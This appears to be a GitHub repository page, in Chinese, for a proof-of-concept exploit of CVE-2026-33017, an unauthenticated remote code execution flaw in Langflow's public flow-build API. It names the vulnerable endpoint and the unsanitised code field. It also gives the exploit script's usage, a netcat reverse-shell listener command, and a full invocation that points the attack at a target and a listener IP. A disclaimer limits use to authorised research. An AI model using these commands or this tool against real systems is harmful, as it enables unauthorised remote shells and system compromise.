Industri4l-H3ll-Xpl0it3rs/CVE-2026-33017-Langflow-RCE
GitHub: Industri4l-H3ll-Xpl0it3rs/CVE-2026-33017-Langflow-RCE
针对 Langflow 1.9.0 之前版本 CVE-2026-33017 未经身份验证远程代码执行漏洞的概念验证利用工具,通过 flow building API 注入恶意 Python 代码实现任意命令执行。
Stars: 1 | Forks: 1
# CVE-2026-33017 - Langflow RCE 漏洞
由 [infrar3d](https://github.com/Infrar3dd) 利用
此概念验证利用程序针对 Langflow 1.9.0 之前版本中存在的一个严重的远程代码执行(RCE)漏洞。该漏洞允许未经身份验证的攻击者通过 flow building API endpoint 注入恶意 Python 代码来执行任意系统命令。该漏洞存在于 ```/api/v1/build_public_tmp/{flow_id}/flow endpoint``` 中,该接口未对 component templates 的 code 字段中用户提供的代码进行适当的清理。
### 用法:
```
python3 CVE-2026-33017.py --help
usage: CVE-2026-33017.py [-h] -u URL -f FLOW -H HOST [-P PORT]
Langflow RCE Exploit
options:
-h, --help show this help message and exit
-u, --url URL Target base URL
-f, --flow FLOW Flow ID
-H, --host HOST Listener host for reverse shell
-P, --port PORT Listener port (default: 4444)
```
### 示例:
第一个终端(监听端):
```
nc -lvnp 4444
```
第二个终端(利用端):
```
python3 CVE-2026-33017.py --url https://fireflowservice.example --flow abcd1234-efgh-5678-ijkl-9012mnop --host 10.10.10.10 --port 4444
```
### ⚠️ 免责声明 ⚠️
本软件和概念验证代码**仅供教育和研究目的**提供。
* 作者对因本程序造成的任何滥用或损坏**概不负责**。
* **严禁**在未获得明确**事先许可**的情况下对任何系统使用本工具。
* 未经同意使用此工具攻击目标是**非法的**。
您有责任遵守所有适用的法律法规。**请以道德和负责任的方式使用。**
标签:Langflow, Python, 安全, 无后门, 编程工具, 超时处理, 远程代码执行, 逆向工具